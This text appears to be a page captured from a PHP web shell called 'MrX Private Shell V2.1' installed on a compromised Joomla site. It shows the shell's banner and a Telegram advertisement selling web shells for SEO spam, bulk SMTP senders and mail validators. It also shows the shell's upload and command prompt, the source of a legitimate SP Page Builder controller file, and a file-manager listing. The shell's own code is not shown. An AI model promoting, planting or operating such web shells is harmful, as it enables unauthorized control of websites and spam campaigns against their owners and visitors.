__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

/**
 * @package SP Page Builder
 * @author JoomShaper http://www.joomshaper.com
 * @copyright Copyright (c) 2010 - 2024 JoomShaper
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
 */

use Joomla\CMS\MVC\Controller\AdminController;
use JoomShaper\SPPageBuilder\DynamicContent\DynamicContent;

//no direct access
defined('_JEXEC') or die('Restricted access');


class SppagebuilderControllerCollections extends AdminController
{
    private $dynamicContent = null;

    /**
     * The constructor method
     * 
     * @since 5.5.0
     */
    public function __construct($config = [])
    {
        if (file_exists(JPATH_ROOT . '/administrator/components/com_sppagebuilder/vendor/autoload.php')) {
            require_once JPATH_ROOT . '/administrator/components/com_sppagebuilder/vendor/autoload.php';
        }

        if (file_exists(JPATH_ROOT . '/administrator/components/com_sppagebuilder/dynamic-content/helper.php')) {
            require_once JPATH_ROOT . '/administrator/components/com_sppagebuilder/dynamic-content/helper.php';
        }

        parent::__construct($config);
        $this->dispatchToDynamicContent();
    }

    /**
     * Create dynamic content instance for executing the tasks.
     * 
     * @since 5.5.0
     */
    public function dispatchToDynamicContent()
    {
        $this->dynamicContent = DynamicContent::create($this);
    }

    /**
     * Override the execute method to dispatch the task to the dynamic content.
     * 
     * @since 5.5.0
     */
    public function execute($task)
    {
        return call_user_func_array([$this->dynamicContent, 'dispatch'], [$task, $this->input]);
    }
}

Filemanager

Name Type Size Permission Actions
collections.php File 1.63 KB 0664
editor.php File 6.51 KB 0664
instagram.php File 5.41 KB 0664
page.php File 13.16 KB 0664
pages.php File 567 B 0664
Filemanager